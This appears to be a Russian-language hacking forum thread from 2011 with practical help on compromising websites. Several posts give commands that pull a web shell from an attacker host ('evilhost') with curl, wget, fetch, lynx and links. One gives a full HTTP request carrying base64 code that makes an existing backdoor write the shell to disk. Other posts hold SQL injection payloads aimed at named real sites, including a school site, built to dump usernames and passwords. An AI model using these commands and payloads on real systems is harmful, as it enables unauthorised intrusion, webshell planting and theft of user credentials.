HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16491  
Старый 03.03.2011, 16:03
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

качай курлом и записывай в файл

UPD: зачем ты юзаеш этот бекдор если не знаеш что оно делает?

вариантов море, eval()+file_get_contents(), copy(),wget, sockets, php_curl, system_curl
 
Ответить с цитированием

  #16492  
Старый 03.03.2011, 16:50
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от noviyuser  
noviyuser said:
какие еще команды есть напободие wget?
curl, fetch, links, lynx, get

Проверить наличие качалок можно команой which.

В консоли: which curl, если качалка установлена, то в ответ получишь /usr/bin/curl (полный путь к исполняемому файлу на сервере)

Синтаксис:

get -o /path/shell.php http://site.com/shell.txt

fetch -o /path/shell.php http://site.com/shell.txt

curl --output /path/shell.php http://site.com/shell.txt

links -source http://site.com/shell.txt > /path/shell.php

lynx -source http://site.com/shell.txt > /path/shell.php

Цитата:
Сообщение от None  

можно ли этой командой залить полноценный шелл? можно примерчик?
Можно, зависит от настроек php.

Пример для allow_url_fopen = on (ну и функция copy разумеется не должна находиться в disable functions)

Посылаешь пакет:

Код HTML:
HTML:
POST http://site.com/backdoor.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Keep-Alive: 115
Connection: keep-alive

e=Y29weSgnaHR0cDovL2V2aWxob3N0L3NoZWxsLnR4dCcsJy9zaXRlL3d3dy9zaGVsbC5waHAnKTs
где e=copy('http://evilhost/shell.txt','/site/www/shell.php'); в base64_encode

http://evilhost/shell.txt - откуда льем

/site/www/shell.php - куда (абсолютный путь до папки доступной на запись)
 
Ответить с цитированием

  #16493  
Старый 03.03.2011, 16:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

тама очень просто с курлом

Код:
Code:
curl http://evilhost/shell.php > /home/www/public_html/shell.php
 
Ответить с цитированием

  #16494  
Старый 04.03.2011, 00:26
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Помогите обойти фильтрацию.

http://www.footballfoundation.org/news.php?id=2194/**/union/**/select/**/1,2,3,4,5,6,7+--+
 
Ответить с цитированием

  #16495  
Старый 04.03.2011, 01:03
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
пост наше щастье
 
Ответить с цитированием

  #16496  
Старый 04.03.2011, 03:37
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28895

Репутация: 4
По умолчанию

Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.
 
Ответить с цитированием

  #16497  
Старый 04.03.2011, 03:53
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от Lijzer  
Lijzer said:
Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.
Эм... Способ эксплуатации SQL-inject'a не изменился и не думаю, что измениться. А если хочешь разобраться хорошо в разных SQL-языках, то читай книги по этим языкам и все. А для всего остального шпаргалки\статьи, которые есть на широких просторах интернета и в т.ч. на этом форуме.
 
Ответить с цитированием

  #16498  
Старый 04.03.2011, 17:13
DieWithMe
Guest
Сообщений: n/a
Провел на форуме:
1822

Репутация: 0
По умолчанию

Помогите разобраться с sql-иньекциями.

С помощью сканера из этого топика нашел 10 уязвимостей на нужном мне сайте, большинство из них sql. Сам сканер в качестве уязвимой ссылки выдает что-то оканчивающееся на 0'+'1'=2. Пробовал подставлять вместо этого различные эксплоиты и просто кавычку, но показывается обычная страница, без всяких ошибок.

Собственно интересно, сканер врет или я что-то не то делаю... Как можно проверить на sql уязвимость кроме кавычки?
 
Ответить с цитированием

  #16499  
Старый 04.03.2011, 17:24
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

как говорил конки, спроси у сканера

а если по теме то https://forum.antichat.net/thread19844.html
 
Ответить с цитированием

  #16500  
Старый 04.03.2011, 18:34
DieWithMe
Guest
Сообщений: n/a
Провел на форуме:
1822

Репутация: 0
По умолчанию

Судя по первому абзацу все-же сканер врет...

Сайт нагуглил по версии джумлы, вот линки на предполагаемые уязвимости

liceum9.ru/index.php?option=com_comprofiler&task=userProfile& user=1+and+1=2 юзеры начинаются с id 121, для их просмотра пришлось зарегится.

http://www.liceum9.ru/index.php?option=com_content&task=blogcategory&id= 60&Itemid=%2099999%20union%20select%201,concat_ws% 280x3a,username,password%29,%203,4,5%20from%20jos_ users/*

http://www.liceum9.ru/index.php?option=com_banners&task=archivesection&i d='0'+and+'1'='2

В последнем вообще валидный id подобрать не смог...

Проверьте, пожалуйста, эти ссылки на sql-уязвимость. Очень хочется, чтобы первый блин не вышел комом.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ